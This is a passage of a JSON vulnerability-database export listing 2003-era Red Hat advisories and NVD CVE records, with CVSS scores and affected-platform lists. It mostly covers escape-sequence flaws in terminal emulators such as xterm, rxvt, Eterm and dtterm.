"(RHSA-2003:063) openssl security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0078"], "modified": "2018-03-14T15:27:14", "id": "RHSA-2003:063", "href": "https://access.redhat.com/errata/RHSA-2003:063", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-21T04:46:38", "description": "The Apache HTTP server is a powerful, full-featured, efficient, and\nfreely-available Web server.\n\nBen Laurie found a bug in the optional renegotiation code in mod_ssl\nwhich can cause cipher suite restrictions to be ignored. This is triggered\nif optional renegotiation is used (SSLOptions +OptRenegotiate) along with\nverification of client certificates and a change to the cipher suite over\nthe renegotiation. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2003-0192 to this issue.\n\nApache does not filter terminal escape sequences from its error logs, which\ncould make it easier for attackers to insert those sequences into terminal\nemulators containing vulnerabilities related to escape sequences. The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has assigned\nthe name CAN-2003-0020 to this issue.\n\nIt is possible to get Apache 1.3 to get into an infinite loop handling\ninternal redirects and nested subrequests. A patch for this issue adds a\nnew LimitInternalRecursion directive.\n\nAll users of the Apache HTTP Web Server are advised to upgrade to the\napplicable errata packages, which contain back-ported fixes correcting\nthese issues.\n\nAfter the errata packages are installed, restart the Web service by running\nthe following command:\n\n/sbin/service httpd restart", "cvss3": {}, "published": "2003-09-22T00:00:00", "type": "redhat", "title": "(RHSA-2003:244) apache security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0020", "CVE-2003-0192"], "modified": "2018-03-14T15:25:42", "id": "RHSA-2003:244", "href": "https://access.redhat.com/errata/RHSA-2003:244", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-10-21T14:38:51", "description": "Hangul Terminal is a terminal emulator for the X Window System, based on Xterm.\n\nHangul Terminal provides an escape sequence for reporting the current\nwindow title, which essentially takes the current title and places it\ndirectly on the command line. An attacker can craft an escape sequence\nthat sets the window title of a victim using Hangul Terminal to an\narbitrary command and then report it to the command line. Since it is not\npossible to embed a carriage return into the window title the attacker\nwould then have to convince the victim to press Enter for it to process the\ntitle as a command, although the attacker could craft other escape\nsequences that might convince the victim to do so.\n\nIt is possible to lock up Hangul Terminal before version 2.0.5 by sending\nan invalid DEC UDK escape sequence. \n\nUsers are advised to upgrade to these erratum packages, which contain\nHangul Terminal version 2.0.5 which is not vulnerable to these issues.", "cvss3": {}, "published": "2003-07-08T00:00:00", "type": "redhat", "title": "(RHSA-2003:071) hanterm-xf security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0077", "CVE-2003-0079"], "modified": "2018-03-14T15:27:57", "id": "RHSA-2003:071", "href": "https://access.redhat.com/errata/RHSA-2003:071", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-11-29T16:26:36", "description": "CRLF injection vulnerability in xterm allows user-assisted attackers to execute arbitrary commands via LF (aka \\n) characters surrounding a command name within a Device Control Request Status String (DECRQSS) escape sequence in a text file, a related issue to CVE-2003-0063 and CVE-2003-0071.", "cvss3": {}, "published": "2009-01-02T18:11:09", "type": "cve", "title": "CVE-2008-2383", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0063", "CVE-2003-0071", "CVE-2008-2383"], "modified": "2023-11-07T02:02:13", "cpe": ["cpe:/a:invisible-island:xterm:_nil_"], "id": "CVE-2008-2383", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2383", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:invisible-island:xterm:_nil_:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-28T14:00:39", "description": "The Eterm terminal emulator 0.9.1 and earlier allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "cve", "title": "CVE-2003-0068", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0068"], "modified": "2016-10-18T02:29:00", "cpe": ["cpe:/a:michael_jennings:eterm:0.8.10", "cpe:/a:michael_jennings:eterm:0.9.1"], "id": "CVE-2003-0068", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0068", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:michael_jennings:eterm:0.8.10:*:*:*:*:*:*:*", "cpe:2.3:a:michael_jennings:eterm:0.9.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-28T14:00:18", "description": "The menuBar feature in rxvt 2.7.8 allows attackers to modify menu options and execute arbitrary commands via a certain character escape sequence that inserts the commands into the menu.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "cve", "title": "CVE-2003-0023", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0023"], "modified": "2016-10-18T02:28:00", "cpe": ["cpe:/a:rxvt:rxvt:2.6.3", "cpe:/a:rxvt:rxvt:2.7.5", "cpe:/a:rxvt:rxvt:2.6.2", "cpe:/a:rxvt:rxvt:2.7.6", "cpe:/a:rxvt:rxvt:2.7.8", "cpe:/a:rxvt:rxvt:2.6.1", "cpe:/a:rxvt:rxvt:2.6.4", "cpe:/a:rxvt:rxvt:2.7.7"], "id": "CVE-2003-0023", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0023", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:rxvt:rxvt:2.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.7.7:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.7.8:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.6.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-28T14:00:05", "description": "The menuBar feature in aterm 0.42 allows attackers to modify menu options and execute arbitrary commands via a certain character escape sequence that inserts the commands into the menu.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "cve", "title": "CVE-2003-0024", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0024"], "modified": "2016-10-18T02:28:00", "cpe": ["cpe:/a:aterm:aterm:0.42"], "id": "CVE-2003-0024", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0024", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:aterm:aterm:0.42:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-29T16:18:19", "description": "Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.", "cvss3": {}, "published": "2003-03-18T05:00:00", "type": "cve", "title": "CVE-2003-0020", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0020"], "modified": "2023-11-07T01:56:12", "cpe": [], "id": "CVE-2003-0020", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0020", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-11-28T14:00:44", "description": "The DEC UDK processing feature in the hanterm (hanterm-xf) terminal emulator before 2.0.5 allows attackers to cause a denial of service via a certain character escape sequence that causes the terminal to enter a tight loop.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "cve", "title": "CVE-2003-0079", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0079"], "modified": "2016-10-18T02:29:00", "cpe": ["cpe:/a:hanterm:hanterm-xf:2.0"], "id": "CVE-2003-0079", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0079", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:hanterm:hanterm-xf:2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-28T14:00:47", "description": "VTE, as used by default in gnome-terminal terminal emulator 2.2 and as an option in gnome-terminal 2.0, allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "cve", "title": "CVE-2003-0070", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0070"], "modified": "2016-10-18T02:29:00", "cpe": ["cpe:/a:nalin_dahyabhai:vte:0.24.3", "cpe:/a:nalin_dahyabhai:vte:0.20.5", "cpe:/a:nalin_dahyabhai:vte:0.15.0", "cpe:/a:nalin_dahyabhai:vte:0.22.5", "cpe:/a:gnome:gnome-terminal:2.0", "cpe:/a:gnome:gnome-terminal:2.2", "cpe:/a:nalin_dahyabhai:vte:0.25.1", "cpe:/a:nalin_dahyabhai:vte:0.12.2", "cpe:/a:nalin_dahyabhai:vte:0.17.4", "cpe:/a:nalin_dahyabhai:vte:0.14.2", "cpe:/a:nalin_dahyabhai:vte:0.16.14", "cpe:/a:nalin_dahyabhai:vte:0.11.21"], "id": "CVE-2003-0070", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0070", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:gnome:gnome-terminal:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.25.1:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.16.14:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.24.3:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.11.21:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnome:gnome-terminal:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.22.5:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.17.4:*:*:*:*:*:*:*", "cpe:2.3:a:nalin_dahyabhai:vte:0.20.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-28T14:01:04", "description": "The \"screen dump\" feature in rxvt 2.7.8 allows attackers to overwrite arbitrary files via a certain character escape sequence when it is echoed to a user's terminal, e.g. when the user views a file containing the malicious sequence.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "cve", "title": "CVE-2003-0022", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0022"], "modified": "2016-10-18T02:28:00", "cpe": ["cpe:/a:rxvt:rxvt:2.6.3", "cpe:/a:rxvt:rxvt:2.7.5", "cpe:/a:rxvt:rxvt:2.6.2", "cpe:/a:rxvt:rxvt:2.7.6", "cpe:/a:rxvt:rxvt:2.7.8", "cpe:/a:rxvt:rxvt:2.6.1", "cpe:/a:rxvt:rxvt:2.6.4", "cpe:/a:rxvt:rxvt:2.7.7"], "id": "CVE-2003-0022", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0022", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:rxvt:rxvt:2.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.7.7:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.7.8:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:rxvt:rxvt:2.6.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-28T14:00:37", "description": "The dtterm terminal emulator allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "cve", "title": "CVE-2003-0064", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0064"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/o:sgi:irix:6.5.5f", "cpe:/o:sgi:irix:6.5.8f", "cpe:/o:sgi:irix:6.5.5m", "cpe:/o:sgi:irix:6.0.1", "cpe:/o:hp:hp-ux:10.30", "cpe:/o:sgi:irix:6.5.13m", "cpe:/o:sgi:irix:5.0", "cpe:/o:sgi:irix:6.5.5", "cpe:/o:ibm:aix:4.3.1", "cpe:/o:sgi:irix:6.2", "cpe:/o:sgi:irix:6.5.6", "cpe:/o:sun:sunos:5.8", "cpe:/o:sgi:irix:6.5.18f", "cpe:/o:hp:hp-ux:10.20", "cpe:/o:ibm:aix:4.3", "cpe:/o:sgi:irix:6.5.18m", "cpe:/o:sgi:irix:6.5.15f", "cpe:/o:sgi:irix:6.5.2m", "cpe:/o:sun:sunos:5.7", "cpe:/o:sgi:irix:6.0", "cpe:/o:sgi:irix:6.5.14m", "cpe:/o:sgi:irix:6.5.2f", "cpe:/o:sgi:irix:5.1", "cpe:/o:sun:solaris:9.0", "cpe:/o:sgi:irix:6.5.1", "cpe:/o:sgi:irix:6.5.7f", "cpe:/o:sgi:irix:6.5.17", "cpe:/o:hp:hp-ux:11.00", "cpe:/o:sgi:irix:6.5.12f", "cpe:/o:hp:hp-ux:11.04", "cpe:/o:hp:hp-ux:11.20", "cpe:/o:sgi:irix:6.5", "cpe:/o:sgi:irix:6.5.8m", "cpe:/o:sgi:irix:6.5.10", "cpe:/o:sgi:irix:6.5.15m", "cpe:/o:sgi:irix:6.5.16", "cpe:/o:sgi:irix:6.5.6f", "cpe:/o:sgi:irix:6.5.16m", "cpe:/o:sgi:irix:6.3", "cpe:/o:sgi:irix:6.5.3m", "cpe:/o:sgi:irix:6.5.4f", "cpe:/o:sgi:irix:6.5.17f", "cpe:/o:sgi:irix:6.4", "cpe:/o:sgi:irix:6.5.15", "cpe:/o:sgi:irix:6.5.11", "cpe:/o:sgi:irix:6.5.10m", "cpe:/o:sgi:irix:6.5.3", "cpe:/o:sgi:irix:6.5.13", "cpe:/o:sgi:irix:6.5.8", "cpe:/o:sgi:irix:6.5.4", "cpe:/o:ibm:aix:4.3.3", "cpe:/o:sgi:irix:6.5.13f", "cpe:/o:sgi:irix:6.1", "cpe:/o:sgi:irix:6.5.12", "cpe:/o:sgi:irix:6.5.9f", "cpe:/o:sgi:irix:6.5.12m", "cpe:/o:sgi:irix:6.5.6m", "cpe:/o:sgi:irix:5.0.1", "cpe:/o:sgi:irix:6.5.7", "cpe:/o:sgi:irix:6.5.2", "cpe:/o:sgi:irix:6.5.7m", "cpe:/o:sgi:irix:6.5.18", "cpe:/o:sgi:irix:6.5.16f", "cpe:/o:sun:solaris:8.0", "cpe:/o:sgi:irix:6.5.11f", "cpe:/o:hp:hp-ux:10.26", "cpe:/o:sgi:irix:5.1.1", "cpe:/o:sgi:irix:6.5.14f", "cpe:/o:sun:solaris:2.5.1", "cpe:/o:sgi:irix:6.5.3f", "cpe:/o:ibm:aix:5.2", "cpe:/o:sgi:irix:6.5.11m", "cpe:/o:sgi:irix:5.3", "cpe:/o:hp:hp-ux:11.22", "cpe:/o:sun:solaris:2.6", "cpe:/o:sgi:irix:6.5.14", "cpe:/o:sgi:irix:6.5.10f", "cpe:/o:hp:hp-ux:11.11", "cpe:/o:hp:hp-ux:10.24", "cpe:/o:sun:sunos:5.5.1", "cpe:/o:hp:hp-ux:10.34", "cpe:/o:sgi:irix:6.5.9m", "cpe:/o:ibm:aix:5.1", "cpe:/o:ibm:aix:4.3.2", "cpe:/o:sgi:irix:6.5.9", "cpe:/o:sun:sunos:-", "cpe:/o:sgi:irix:5.2", "cpe:/o:sun:solaris:7.0", "cpe:/o:sgi:irix:6.5.17m", "cpe:/o:sgi:irix:6.5.4m"], "id": "CVE-2003-0064", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0064", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:sgi:irix:6.5.15:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.15f:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.1:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:10.20:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.16f:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.2f:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.9f:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.11f:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.14f:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:-:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.8:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.13:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:10.30:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:10.24:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.3:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.3f:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.7:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.8m:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:2.5.1:*:x86:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.10m:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:2.6:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.6f:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.16:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:11.00:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:11.22:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.3:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.18m:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.5f:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.14:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.8:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.8f:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.12f:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:11.11:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.9m:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:11.20:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.14m:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.12m:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.7m:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.6m:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:5.1:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.17f:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:10.34:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.2m:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.4:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.7f:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.12:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.4m:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.18f:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.13f:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.11m:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:5.2:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:11.04:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.11:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.17:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:8.0:*:x86:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.13m:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.5m:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.18:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.17m:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.10:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:7.0:*:x86:*:*:*:*:*", "cpe:2.3:o:sun:solaris:9.0:*:x86:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:9.0:*:sparc:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.3m:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.2:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.15m:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.3:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.9:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.16m:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5.6:*:*:*:*:*:*:*", 